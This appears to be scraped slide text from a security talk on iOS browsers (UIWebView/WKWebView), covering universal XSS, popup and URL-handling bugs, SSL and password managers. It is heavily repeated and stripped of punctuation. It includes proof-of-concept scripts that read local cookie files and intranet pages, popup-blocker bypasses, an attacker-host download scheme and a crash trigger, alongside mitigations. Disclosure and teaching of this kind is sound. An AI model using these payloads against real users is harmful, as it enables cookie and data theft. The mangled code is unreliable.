Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 45: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/45.jpg)
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 46: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/46.jpg)
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 47: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/47.jpg)
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 48: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/48.jpg)
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
